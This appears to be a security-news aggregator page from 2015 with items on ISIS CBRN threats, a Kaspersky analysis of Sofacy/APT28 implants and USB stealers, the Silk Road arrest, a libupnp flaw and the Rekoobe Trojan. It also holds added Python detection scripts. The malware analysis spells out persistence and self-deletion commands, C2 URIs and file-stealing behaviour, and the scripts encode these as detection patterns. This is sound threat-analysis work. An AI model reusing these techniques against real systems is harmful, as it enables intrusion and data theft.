“ISIS actually has already acquired the knowledge, and in some cases the human expertise, that would allow it to use CBRN materials as weapons of terror.” said Wolfgang Rudischhauser, Director of the Weapons of Mass Destruction Non-Proliferation Centre at NATO.

The shocking revelation is included in a European Parliament report which confirms that ISIS “may be planning to try to use internationally banned weapons of mass destruction in future attacks.”

The report comes after the recent Paris attacks and claims that ISIS has already smuggled weapon of mass destruction (WMD) material into Europe.

The report confirms that ISIS is recruiting foreign fighters with specific competencies in physics, chemistry and computer science.

“ISIL/Da’esh has recruited and continues to recruit hundreds of foreign fighters, including some with degrees in physics, chemistry and computer science, who experts believe have the ability to manufacture lethal weapons from raw substances.”

The British police forces have been conducting specific exercises to train their personnel to face various types of terrorist attacks, including chemical and biological ones.

“The European Union and its Member States must prepare for the possibility of a chemical or biological attack on their territory by the self-styled ‘Islamic State’ in Iraq and the Levant (known variously as IS, ISIS or ISIL, and by the Arabic acronym ‘Da’esh’).” states the report. “At present, European citizens are not seriously contemplating the possibility that extremist groups might use chemical, biological, radiological or nuclear (CBRN) materials during attacks in Europe. Under these circumstances, the impact of such an attack, should it occur, would be even more destabilising.”

European law enforcement agencies are facing the most serious and well-resourced terrorist organization ever.

“We are dealing with a very serious, well-resourced, determined international terrorist organisation that is now active on the streets of Europe.” explained Rob Wainwright, head of Europol. “This represents the most serious terrorist threat faced in Europe for 10 years.”

Nomi Bar-Yaacov, Associate Fellow in Chatham House’s International Security Department, explained to the DailyMail that the risk is real.

“There is a very real risk of ISIS using unconventional weapons in Europe and beyond,” said Nomi Bar-Yaacov.

Western intelligence agencies are trying to monitor jihadi fighters, especially those with ‘specialist CBRN knowledge’.

EU governments have been warned to watch out for ‘other radicalised individuals, who have access to, or work in, sensitive areas’.

How is it possible to steal CBRN material in Europe?

According to the 2014 Communication of the European Commission on a new EU approach to the detection and mitigation of CBRN-E risks, terrorist organizations have several opportunities to steal CBRN material.

The Commission confirmed that thefts and misplacements of CBRN material occur hundreds of times each year. The dangerous substances include sarin, ricin and anthrax.

“More than 150 cases of trafficking of radiological and nuclear materials are reported annually to the Incident and Trafficking Database of the International Atomic Energy Agency (IAEA);” states the report.

Intelligence agencies are aware that CBRN substances have been illegally smuggled into the European Union; Interpol’s monthly CBRN intelligence reports describe numerous examples of attempts to acquire, smuggle or use CBRN materials.

Sofacy APT hits high profile targets with updated toolset
6.12.2015  Source: Kaspersky
Sofacy (also known as “Fancy Bear”, “Sednit”, “STRONTIUM” and “APT28”) is an advanced threat group that has been active since around 2008, targeting mostly military and government entities worldwide, with a focus on NATO countries. More recently, we have also seen an increase in activity targeting Ukraine.

Back in 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as its first stage malware. The implant shared certain similarities with the old Miniduke implants. This led us to believe the two groups were connected, at least to begin with, although it appears they parted ways in 2014, with the original Miniduke group switching to the CosmicDuke implant.

At some point during 2013, the Sofacy group expanded its arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across four to five generations) and a few others. We’ve seen quite a few versions of these implants and they were relatively widespread for a time.

Earlier this year, we noticed a new release of the AZZY implant which, at the time, was largely undetected by anti-malware products. We observed several waves of attacks using this version, most recently in October. The new waves of attacks also included a new generation of USB stealers deployed by the Sofacy actor, with the first versions dating back to February 2015, and which appear to be geared exclusively towards high profile targets.

Sofacy’s August 2015 attack wave

In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself. For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox. The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day (CVE-2015-2590) in July 2015.

While the JHUHUGIT (and more recently “JKEYSKW”) implant is used in most of the Sofacy attacks, high profile victims are being targeted with another first level implant, representing the latest evolution of their AZZY Trojan.

The first versions of the new AZZY implant appeared in August of this year. During a high profile incident we investigated, our products successfully detected and blocked a “standard” Sofacy “AZZY” sample that was used to target a range of defense contractors. The sample used in this attack (md5 A96F4B8AC7AA9DBF4624424B7602D4F7, compiled July 29th, 2015) was a pretty standard Sofacy x64 AZZY implant, which has the internal name “advshellstore.dll”.

Interestingly, the fact that the attack was blocked didn’t appear to stop the Sofacy team. Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor (md5: 9D2F9E19DB8C20DC0D20D50869C7A373, compiled August 4th, 2015). This was no longer detectable with static signatures by our product. However, it was detected dynamically by the host intrusion prevention subsystem when it appeared in the system and was executed.

This recurring, blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability — instead, they appeared to be downloaded and installed by another malware. This separate malware was installed by an unknown attack as “AppData\Local\Microsoft\Windows\msdeltemp.dll” (md5: CE8B99DF8642C065B6AF43FDE1F786A3).

The top level malware, CE8B99DF8642C065B6AF43FDE1F786A3 (named by its authors “msdeltemp.dll” according to internal strings, and compiled July 28th, 2015) is a rare type of the Sofacy AZZY implant. It has been modified to drop a separate C&C helper, (md5: 8C4D896957C36EC4ABEB07B2802268B9) as “tf394kv.dll“.

The dropped “tf394kv.dll” file is an external C&C communications library, compiled on July 24th, 2015 and used by the main backdoor for all Internet-based communications.

Decrypted configuration block of the C&C helper library “tf394kv.dll“

This code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file. In the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularisation follows the same line of thinking.

In addition to the new AZZY backdoors with side-DLL for C&C, we observed a new set of data-theft modules deployed against victims by the Sofacy group. Among the most popular modern defense mechanisms against APTs are air-gaps — isolated network segments without Internet access, where sensitive data is stored. In the past, we’ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks. The Sofacy group uses such tools as well.

The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET.

One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c, which is named internally as msdetltemp.dll.

This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\%volume serial number%“, from where it can be exfiltrated by the attackers using one of the AZZY implants. More details on the new USB stealers are available in the section on technical analysis.

Over the last year, the Sofacy group has increased its activity almost tenfold when compared to previous years, becoming one of the most prolific, agile and dynamic threat actors in the arena. This activity spiked in July 2015, when the group dropped two completely new exploits, an Office and Java zero-day.

At the beginning of August, Sofacy began a new wave of attacks, focusing on defense-related targets. As of November 2015, this wave of attacks is ongoing. The attackers deploy a rare modification of the AZZY backdoor, which is used for the initial reconnaissance. Once a foothold is established, they try to upload more backdoors, USB stealers as well as other hacking tools such as “Mimikatz” for lateral movement.

Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience. In the past, the group used droppers that installed both the SPLM and AZZY backdoors on the same machine. If one of them was detected, the other one provided the attacker with continued access.

As usual, the best defense against targeted attacks is a multi-layered approach. Combine traditional anti-malware technologies with patch management, host intrusion detection and, ideally, whitelisting and default-deny strategies. According to a study by the Australian DSD, 85% of the targeted attacks analysed could have been stopped by four simple defense strategies. While it’s impossible to achieve 100% protection, in practice and most cases all you have to do is increase your defenses to the point where it becomes too expensive for the attacker – who will just give up and move on to other targets.

More information about the Sofacy group is available to customers of Kaspersky Intelligent Services.

Is there a ‘silver bullet’ to protect yourself against Sofacy? Learn more on Kaspersky Business blog.

Technical analysis

Internal name: DWN_DLL_MAIN.dll
File format: PE32 DLL
MD5: ce8b99df8642c065b6af43fde1f786a3
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.07.28 13:05:20 (GMT)
Exported functions:

10003F30: ?Applicate@@YGHXZ
10004270: ?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z
The library starts its main worker thread from the DllMain function.

Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm. In addition to that, API function names are reversed, presumably to avoid detection in memory.

Once started, the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location: “%TEMP%\tf394kv.dll”. If this file is not present, it is recreated from a hardcoded encrypted array inside the body of the DLL.

Next, the module enters an infinite loop. Every five minutes it collects basic system information and sends it to the C2 server:

Windows version number
Hardcoded string “4.3” (the backdoor’s internal version number)
List of running processes
The main thread also spawns a separate thread for receiving new commands from the C2 servers. Every 10 minutes, it sends a new request to the server. The server is expected to send back executable code and one of the following commands:

Write a new file “%LOCAL_APPDATA%\dllhost.exe” or “%TEMP%\dllhost.exe” and execute it, then delete the file
Write a new file “%LOCAL_APPDATA%\sechost.dll” or “%TEMP%\sechost.dll” and call its first exported function using “rundll32.exe” or Windows API, then delete the file
Run shellcode provided by the server in a new thread
While processing the commands, the backdoor logs all errors and execution results. The module also reads the contents of the file “%APPDATA%\chkdbg.log” and appends it to the results. It then sends the aggregated log back to the C2 server.

The module aborts the thread receiving C2 commands after it fails to correctly execute commands more than six times in a row, i.e. if file or process creation fails.

The export called “k” is a wrapper for the “LoadLibraryA” API function.

The export called “SendDataToServer_2” does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded.

Hardcoded C&C servers in the main module

The two C&C’s hardcoded in the configuration block of the main binary are:

The export called “Applicate” runs a standard Windows application message loop until a “WM_ENDSESSION” message is received. It then terminates the main thread.

Internal name: snd.dll
File format: PE32 DLL
MD5: 8c4d896957c36ec4abeb07b2802268b9
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.07.24 12:07:27 (GMT)
Exported functions:

10001580: Init
10001620: InternetExchange
10001650: SendData
This external library implements a simple Wininet-based transport for the main module.

The strings inside the binary are encrypted using 3DES and XOR and reversed.

The DllMain function initializes the library and resolves all required Windows API functions.

The “Init” export establishes a connection to port 80 of a C2 server using the Wininet API. The user agent string employed is “MSIE 8.0”.

The “SendData” export sends an HTTP POST request to the hardcoded URI “/store/”. The reply is returned to the caller if its length is not equal to six and its contents do not contain “OK”.

The “InternetExchange” export closes the established connection and frees associated handles.

Sofacy AZZY 4.3 dropper analysis

File format: PE32 EXE
File size: 142,336 bytes
MD5: c3ae4a37094ecfe95c2badecf40bf5bb
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.02.10 10:01:59 (GMT)

Most of the strings and data in the file are encrypted using 3DES and XOR.

The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure:

Part of the decryption algorithm

Header of one encrypted data buffer containing the hardcoded 3DES key

First, it creates a new directory: “%LOCAL_APPDATA%\Microsoft\Windows”. If the directory creation fails it tries to install into “%TEMP%” directory instead.

Next, it writes a binary hardcoded in its body to “msdeltemp.dll” in the target directory. If the file already exists, it first moves it to “__tmpdt.tmp” in the same directory and continues the installation. It then sets the file creation timestamp to that of “%SYSTEM%\sfc.dll”.

To ensure the dropped payload starts automatically on user log-in, it creates the following registry entry:

StartUpChekTemp=RUNDLL32.EXE “%path to msdeltemp.dll%”,#1

Next, it starts the dropped dll using the same command line:

RUNDLL32.EXE “%path to msdeltemp.dll%“,#1

Finally, the program removes itself by starting the following command: “cmd /c DEL %path to self%“

The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89

Dropper payload – downloader DLL

Internal name: msdetltemp.dll
File format: PE32 DLL
File size: 73 728 bytes
MD5: f6f88caf49a3e32174387cacfa144a89
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.02.10 07:20:02 (GMT)
Exported functions:
10002B55: Applicate

Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed.

The library is an older version of “DWN_DLL_MAIN.dll” (md5: ce8b99df8642c065b6af43fde1f786a3).

The DllMain function is identical and starts the main thread; the “Applicate” function is identical to the one in the newer library. This version of the module does not rely on an external transport DLL for communicating with its C2 servers; instead it directly uses Wininet API functions.

The module contains the following hardcoded C2 server names:

The module uses a hardcoded URI (“/check/”) for sending HTTP POST requests to its C2 servers.

The server is expected to send back executable code and one of the following commands:

Write a new file “%LOCAL_APPDATA%\svchost.exe” or “%TEMP%\svchost.exe” and execute it, then delete the file
Write a new file “%LOCAL_APPDATA%\conhost.dll” or “%TEMP%\conhost.dll” and call its first exported function using “rundll32.exe” or Windows API, then delete the file
Run shellcode provided by the server in a new thread
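
The behaviours described in the technical analysis translate directly into host and proxy checks: the RUNDLL32 “msdeltemp.dll”,#1 autorun entry named StartUpChekTemp, the files the dropper and main module leave under %LOCAL_APPDATA%\Microsoft\Windows, %TEMP% and %APPDATA%, and the HTTP POST beacons to “/store/” (helper DLL, user agent “MSIE 8.0”) and “/check/” (older downloader). The following is an added example, not Kaspersky’s code, that runs those checks over constructed sample telemetry; the proxy log layout and the sample hostnames are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Host-side indicators from the AZZY 4.3 analysis: the autorun value name, the
# RUNDLL32 command line used both for persistence and for the first launch,
# and the files the dropper, main module and C&C helper leave behind.
AZZY_VALUE_NAME = "StartUpChekTemp"
AZZY_RUNDLL_RE = re.compile(
    r'^\s*rundll32(\.exe)?\s+"?[^"]*\\msdeltemp\.dll"?\s*,\s*#1\s*$', re.IGNORECASE)
AZZY_FILE_NAMES = {"msdeltemp.dll", "__tmpdt.tmp", "tf394kv.dll", "chkdbg.log"}
# Network-side indicators: POST URIs of the helper DLL and the older downloader,
# and the bare user agent string the helper DLL sends.
AZZY_C2_URIS = {"/store/", "/check/"}
AZZY_USER_AGENT = "MSIE 8.0"

# Assumed proxy log layout: <timestamp> <client> <method> <url> "<user agent>" <status>
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)'
                    r'\s+"(?P<ua>[^"]*)"\s+(?P<status>\d+)$')


@dataclass
class Finding:
    kind: str
    evidence: str


def check_run_entries(entries):
    """entries: (value_name, value_data) pairs read from a Run key.  Matches on
    the known value name or on the command-line shape, so a renamed value that
    still launches msdeltemp.dll,#1 is caught too."""
    return [Finding("azzy_persistence", f"{name}={data}")
            for name, data in entries
            if name == AZZY_VALUE_NAME or AZZY_RUNDLL_RE.match(data)]


def check_file_paths(paths):
    """paths: absolute paths from a file inventory.  Flags the dropped file
    names only under AppData or a Temp directory, where the dropper writes."""
    findings = []
    for p in paths:
        low = p.replace("/", "\\").lower()
        base = low.rsplit("\\", 1)[-1]
        if base in AZZY_FILE_NAMES and ("\\appdata\\" in low or "\\temp\\" in low):
            findings.append(Finding("azzy_dropped_file", p))
    return findings


def check_proxy_lines(lines):
    """Flags POSTs to the C2 URIs.  The helper DLL sends the bare string
    "MSIE 8.0"; a real IE8 sends "Mozilla/4.0 (compatible; MSIE 8.0; ...)",
    so an exact match is the strong signal and a URI-only hit is weaker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["url"]).path not in AZZY_C2_URIS:
            continue
        kind = "azzy_beacon" if m["ua"] == AZZY_USER_AGENT else "azzy_beacon_uri_only"
        findings.append(Finding(kind, line))
    return findings


# Constructed sample telemetry; not taken from a real incident.
SAMPLE_RUN_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("StartUpChekTemp", r'RUNDLL32.EXE "C:\Users\alice\AppData\Local\Microsoft\Windows\msdeltemp.dll",#1'),
    ("Updater", r'rundll32 "C:\Users\bob\AppData\Local\Temp\msdeltemp.dll", #1'),
]
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Local\Microsoft\Windows\msdeltemp.dll",
    r"C:\Users\alice\AppData\Local\Temp\tf394kv.dll",
    r"C:\Users\alice\AppData\Roaming\chkdbg.log",
    r"C:\Windows\System32\sfc.dll",
]
SAMPLE_PROXY = [
    '2015-08-04T09:12:01Z 10.1.2.3 POST http://c2.example.invalid/store/ "MSIE 8.0" 200',
    '2015-08-04T09:22:01Z 10.1.2.3 POST http://c2.example.invalid/check/ '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" 200',
    '2015-08-04T09:30:00Z 10.1.2.9 GET http://shop.example.invalid/store/ "Mozilla/5.0" 200',
]


def triage(run_entries=SAMPLE_RUN_ENTRIES, paths=SAMPLE_PATHS, proxy_lines=SAMPLE_PROXY):
    """Run all three checks and return the combined findings."""
    return (check_run_entries(run_entries) + check_file_paths(paths)
            + check_proxy_lines(proxy_lines))


if __name__ == "__main__":
    for f in triage():
        print(f"{f.kind}: {f.evidence}")
```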
File collection module (“USB Stealer”)

Internal name: msdetltemp.dll (from resources)
File size: 50,176 bytes
File format: PE32 EXE
MD5: 0369620eb139c3875a62e36bb7abdae8
Linker version: 10.0, Microsoft Visual Studio
Linker timestamp: 2015.02.09 11:48:01 (GMT)

Most of the strings inside the binary are encrypted using 3DES and XOR and reversed.

The program creates the mutex “mtx” and an event named “WerTyQ34C”.

Upon start, it creates a window with the class name “Hello” and title “Program”, subscribes for device arrival notifications for that window and enters a standard Windows message processing loop. The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival.

The module inspects every new disk volume attached to the system. For every disk it creates a “stash” directory in “%root stash directory location%\%volume serial number in hex%” with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM. The root stash directory location may be read from the configuration file or set to the default location which is “%MYPICTURES%”.

Then, it traverses the filesystem of the volume looking for files. Depending on the settings read from the configuration file, the scope may be narrowed to files with particular extensions and/or files created after a specified date.

It is worth noting that if the source file location contains the string “System Volume Information\S-1-5-21-1315235578-283289242\”, then the file is deleted after copying to the “stash” directory. There are known related samples that are able to create such directories on removable drives, e.g. the sample with md5: 8cb08140ddb00ac373d29d37657a03cc.

The configuration file is loaded from the same directory as the module and is expected to have the name “NvCpld.dat”. It is a text file that may contain the following configuration parameters:

Path – location of the root “stash” directory
Ext – search for files with one of these extensions only
Date – search for files not earlier than this date
Internal name: NvCpld.dll (from export table), msdetltemp.dll (from resources), IGFSRVC.dll (from resources)
File format: PE32 DLL
File size: 76,288 bytes
MD5s: 8b238931a7f64fddcad3057a96855f6c, ce151285e8f0e7b2b90162ba171a4b90
Linker version: 11.0, Microsoft Visual Studio
Linker timestamps: 2015.05.29 11:20:32 (GMT), 2006.11.25 04:39:15 (GMT)
Exported functions:
10002500: NvMswt
10002860: NvReg
10002880: NvStart
10002A80: NvStop

This library is a newer version of the file collection module (md5: 0369620eb139c3875a62e36bb7abdae8) wrapped in a DLL file.

There are two known variants of this module; they only differ in timestamp values and version information in the resource section.

The DllMain function only decrypts the data structures and initializes Windows API pointers.

The function “NvMswt” is a wrapper for the API function MsgWaitForMultipleObjects.

The function “NvReg” is a wrapper for the API function RegisterClassW.

The function “NvStart” is similar to the main function of the older module; it creates a window and enters the message loop waiting for device arrival notifications. The only difference introduced is that an event named “WerTyQ34C” can be signalled by the function “NvStop” to terminate the message loop and stop processing.
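
The file collection module described above leaves artefacts a defender can look for on a suspected host and on the removable drives that were plugged into it: a hidden+system directory under %MYPICTURES% named after the volume serial number, files under the “System Volume Information\S-1-5-21-1315235578-283289242\” marker directory (which the stealer deletes after copying), and the event object “WerTyQ34C”. The following is an added example, not Kaspersky’s code, that encodes those checks over a constructed directory listing; rendering the serial as eight hex digits without the dash shown by the vol command is an assumption.

```python
import re

# Win32 attribute bits the stealer sets on the stash directory.
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
FILE_ATTRIBUTE_DIRECTORY = 0x10
STASH_ATTRS = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_DIRECTORY

# The analysis says the directory is named "%volume serial number in hex%";
# the exact rendering is not given, so 8 hex digits (no dash) is assumed here.
STASH_NAME_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Marker directory on removable drives: files under it are deleted after copy.
DELETE_MARKER = "system volume information\\s-1-5-21-1315235578-283289242\\"

# Event name created by both collector variants; the mutex "mtx" is too generic.
STEALER_EVENT = "WerTyQ34C"


def stash_dir_name(volume_serial: int) -> str:
    """Expected stash directory name for a volume, from the DWORD serial that
    GetVolumeInformationW reports (0x1A2B3C4D for `vol` output 1A2B-3C4D)."""
    return f"{volume_serial & 0xFFFFFFFF:08X}"


def find_stash_candidates(listing, known_serials=()):
    """listing: (name, attributes) pairs for entries directly under the root
    stash location (default %MYPICTURES%).  Returns (name, confirmed) for every
    hidden+system directory named like a hex serial; confirmed is True when
    the name matches the serial of a drive known to have been attached."""
    expected = {stash_dir_name(s) for s in known_serials}
    hits = []
    for name, attrs in listing:
        if attrs & STASH_ATTRS != STASH_ATTRS:
            continue
        if not STASH_NAME_RE.match(name):
            continue
        hits.append((name, name.upper() in expected))
    return hits


def marked_for_deletion(path: str) -> bool:
    """True if a file on a removable drive sits under the marker directory that
    the stealer empties after copying its contents."""
    return DELETE_MARKER in path.replace("/", "\\").lower()


def check_named_objects(names):
    """Return the stealer's event name if it is present among live named objects."""
    return [n for n in names if n == STEALER_EVENT]


# Constructed listing of a user's Pictures folder: a normal sub-folder, two
# hidden+system hex-named directories, a file and a plain hex-named directory.
SAMPLE_LISTING = [
    ("Camera Roll", FILE_ATTRIBUTE_DIRECTORY),
    ("1A2B3C4D", STASH_ATTRS),
    ("ABCD1234", STASH_ATTRS),
    ("notes.txt", 0x20),
    ("deadbeef", FILE_ATTRIBUTE_DIRECTORY),
]

if __name__ == "__main__":
    # Serial 0x1A2B3C4D stands for a USB stick seen in the host's setupapi log.
    for name, confirmed in find_stash_candidates(SAMPLE_LISTING, [0x1A2B3C4D]):
        print(f"stash candidate {name} confirmed={confirmed}")
```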

Indicators of compromise:

AZZY 4.3 installer:


New generation (4.3) AZZY implants:


Dropped C&C helper DLL for AZZY 4.3:


File collectors / USB stealers:


Stand-alone AZZY backdoors:


C&C hostnames:

Kaspersky Lab products detect the malware mentioned here with the following names:

Variety Jones, A Senior Adviser to ‪Silk Road‬ arrested in Thailand
The man accused of being "a senior advisor" and mentor of Ross Ulbricht, the convicted operator of the illegal drug marketplace Silk Road, has been arrested in Thailand and charged with conspiring to traffic drugs and money laundering.
The US Department of Justice (DoJ) announced on Friday that Roger Thomas Clark, 54, is accused of being "Variety Jones," a close confidant of Ulbricht who:
Advised Ulbricht on all aspects of Silk Road's operations
Helped Ulbricht grow the notorious website into an extensive criminal enterprise
Clark was arrested Thursday in Thailand and is now awaiting extradition to face United States charges of:
Narcotics Trafficking Conspiracy – carries a maximum sentence of life in prison.
Money Laundering Conspiracy – carries a maximum sentence of 20 years in prison.
Life in Prison
If convicted, Clark faces at least 10 years and as long as life in prison, according to a statement from Manhattan U.S. Attorney Preet Bharara.
According to the press release, Clark used the online aliases of Variety Jones, Cimon, and Plural of Mongoose, and was paid "hundreds of thousands of dollars" for his work on Silk Road.
"[Clark] was the biggest and strongest willed character I had met through the site thus far," Ross Ulbricht wrote in a 2011 journal entry. "He quickly proved to me that he had value by pointing out a major security hole in the site I was unaware of."
Prosecutors also cited an online conversation in which Clark and Ulbricht discussed a plan to "track down" a certain Silk Road employee to ensure that he hadn't gone "off the rails." Clark reportedly commented: "Dude, we're criminal drug dealers – what line shouldn't we cross?"
When Silk Road was shut down and Ross Ulbricht was arrested by law enforcement in October 2013, Variety Jones disappeared.
"The arrest of Roger Thomas Clark shows again that conducting criminal activities on the Dark Web does not keep a criminal out of law enforcement’s reach," said Diego Rodriguez, FBI assistant director.
"Clark may have thought residing in Thailand would keep him out of reach of U.S authorities, but our international partnerships have proven him wrong. We thank our law enforcement partners who have worked with the FBI on this case."
The full press release on the Clark case – U.S. v. Clark, 15-mj-01335, U.S. District Court, Southern District of New York (Manhattan) – is available here.

Serious, Yet Patched Flaw Exposes 6.1 Million IoT, Mobile Devices to Remote Code Execution
As much as you protect your electronics from being hacked, hackers are clever enough to find new ways into your devices. But you would hope that once a flaw is discovered it would at least be fixed in a few days or weeks; that's not always the case.
A three-year-old security vulnerability within a software component used by more than 6.1 Million smart devices still remains unpatched by many vendors, thereby placing Smart TVs, Routers, Smartphones, and other Internet of Things (IoT) products at risk of exploit.
Security researchers at Trend Micro have brought to light a flaw that has been known since 2012 but has still not been patched in many products.
Remote Code Execution Vulnerabilities
Researchers discovered a collection of Remote Code Execution (RCE) vulnerabilities in the Portable SDK for UPnP, or libupnp component – a software library used by mobile devices, routers, smart TVs, and other IoT devices to stream media files over a network.
The flaws occur due to a buffer overflow in Simple Service Discovery Protocol (SSDP), potentially allowing hackers to take full control over the targeted device running the vulnerable version of the software development kit (SDK).
According to the researchers, the vulnerabilities were actually patched in 2012, but many applications still use the outdated versions of the library, allowing remote code execution attacks against devices with flawed apps installed.
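A defender-side inventory check, added here and not part of Trend Micro's research or the libupnp project's code: it parses SSDP messages and flags devices whose SERVER header advertises a Portable SDK for UPnP build older than an assumed patched version. The article names no fixed version, so the threshold constant and the sample messages below are constructed.

```python
"""Flag SSDP advertisements that carry an outdated Portable SDK for UPnP
(libupnp) version. Added example; not Trend Micro's or libupnp's code."""
import re
from typing import Dict, List, Optional, Tuple

# Assumed minimum patched libupnp version: the article names none, so confirm
# this value against the libupnp release notes before relying on it.
PATCHED_VERSION = (1, 6, 18)

# libupnp identifies itself in the SERVER header of SSDP responses and
# NOTIFY messages as "Portable SDK for UPnP devices/<major>.<minor>.<patch>".
SDK_RE = re.compile(r"Portable SDK for UPnP devices/(\d+)\.(\d+)\.(\d+)", re.I)


def parse_ssdp(message: str) -> Dict[str, str]:
    """Parse the start line and headers of one SSDP message into a dict."""
    lines = message.replace("\r\n", "\n").split("\n")
    headers = {"_start": lines[0].strip()}
    for line in lines[1:]:
        if ":" not in line:
            continue  # blank line or malformed header; skip
        name, value = line.split(":", 1)
        headers[name.strip().upper()] = value.strip()
    return headers


def libupnp_version(server_header: str) -> Optional[Tuple[int, int, int]]:
    """Extract the advertised libupnp version, or None if another stack."""
    m = SDK_RE.search(server_header or "")
    return tuple(int(x) for x in m.groups()) if m else None


def outdated_devices(messages: List[Tuple[str, str]]):
    """Return (source, version) for each message advertising a pre-patch libupnp."""
    findings = []
    for src, raw in messages:
        ver = libupnp_version(parse_ssdp(raw).get("SERVER", ""))
        if ver is not None and ver < PATCHED_VERSION:
            findings.append((src, ver))
    return findings


# Constructed sample traffic (documentation addresses, not real captures).
SAMPLE = [
    ("192.0.2.10", "NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                   "SERVER: Linux/3.4, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
                   "NT: upnp:rootdevice\r\n\r\n"),
    ("192.0.2.11", "HTTP/1.1 200 OK\r\n"
                   "SERVER: Linux/4.1, UPnP/1.0, Portable SDK for UPnP devices/1.6.19\r\n"
                   "ST: upnp:rootdevice\r\n\r\n"),
    ("192.0.2.12", "HTTP/1.1 200 OK\r\nSERVER: VendorOS/1.0 UPnP/1.0 OtherStack/2.0\r\n\r\n"),
]

if __name__ == "__main__":
    for src, ver in outdated_devices(SAMPLE):
        print(f"{src}: libupnp {'.'.join(map(str, ver))} predates {PATCHED_VERSION}")
```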
"We found 547 apps that used older versions of libupnp, 326 of which are available on the Google Play store," Trend Micro mobile analyst Veo Zhang wrote in a blog post published Thursday.
Vulnerable Apps Downloaded by Millions of People
The biggest app affected by the flaw is QQMusic, which is used by over 100 Million people in China alone and has been downloaded by millions of Android users from the Google Play store. However, the security issue has since been fixed by the developers.
The Netflix application, also downloaded by Millions of people, was also thought to be affected by the flaw though the researchers say:
"Upon further clarification with Netflix, we learned that Netflix uses their own fork of libupnp due to an API that is no longer a part of newer libupnp versions. However, their fork contains the fixes from newer versions of libupnp as well, so we believe they are not affected by potential remote code execution attacks targeting this vulnerability."
Other popular applications using the outdated version of the library include nScreen Mirroring for Samsung, CameraAccess Plus and Smart TV Remote.
List of Vulnerable Apps
Here's the list of some apps that Trend Micro knows are vulnerable and has actually tested (listed by common name):
- CameraAccess plus
- HexLink Remote (TV client)
- HexLink-SmartTV remote control
- Hisense Android TV Remote
- nScreen Mirroring for Samsung
- Ooredoo TV Oman
- PictPrint – WiFi Print App –
- Mozaic GO
- Smart TV Remote
- Wifi Entertainment
- 에브리온TV (무료 실시간 TV)
Though the makers of QQMusic and LinPhone have addressed the issue and released fixes for their apps, users are advised to check their devices for these apps and, if any is found, simply remove it or check for an update.
The security researchers are continuing to identify more vulnerable apps.

Rekoobe a new malware targeting Linux users

Experts at Russian anti-virus firm Dr.Web discovered Rekoobe, a new malware that is targeting Linux systems.
Rekoobe is a new malware targeting Linux systems; the discovery was made by experts at Russian anti-virus firm Dr.Web.

Dr.Web discovered the Rekoobe Trojan in October, then its experts analyzed the threat in the following two months.

The Rekoobe Trojan was initially developed to infect only Linux systems on SPARC architectures; it has since been upgraded to target Linux PCs running on Intel chips, on both 32-bit and 64-bit architectures.


The experts explained that the Rekoobe Trojan is very simple but difficult to detect. The malware uses encryption to protect its configuration file and the data exchanged with the C&C server.

“Linux.Rekoobe.1 uses an encrypted configuration file. Once the file is read, the Trojan periodically refers to the C&C server to receive commands. Under specific circumstances, the connection to the server is established via a proxy server.” states a blog post published by Dr.Web. “The malware extracts the authorization data from its configuration file. All the sent and received information is split into separate blocks. Every block is encrypted and contains its own signature.”

The analysis of Rekoobe revealed that it could be used to deliver malicious payloads to infected systems in order to fully compromise the target.

